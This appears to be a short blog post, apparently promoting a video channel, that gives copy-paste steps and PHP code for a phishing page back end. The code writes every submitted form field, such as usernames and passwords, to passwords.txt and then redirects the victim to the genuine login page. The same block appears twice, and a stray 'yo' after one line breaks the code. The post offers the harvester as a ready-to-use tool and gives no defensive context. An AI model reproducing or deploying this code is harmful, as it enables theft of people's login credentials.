CODE FILE:-
1. Open notepad
2. Paste the Following codes
<?php
header ('Location: original login page');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");yo
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
3. Save as code.php
---------------------------------------------------------------------------------
SUBSCRIBE OUR CHANNEL
----------------------------------------
1. Open notepad
2. Paste the Following codes
<?php
header ('Location: original login page');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");yo
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
3. Save as code.php
---------------------------------------------------------------------------------
SUBSCRIBE OUR CHANNEL
----------------------------------------
No comments:
Post a Comment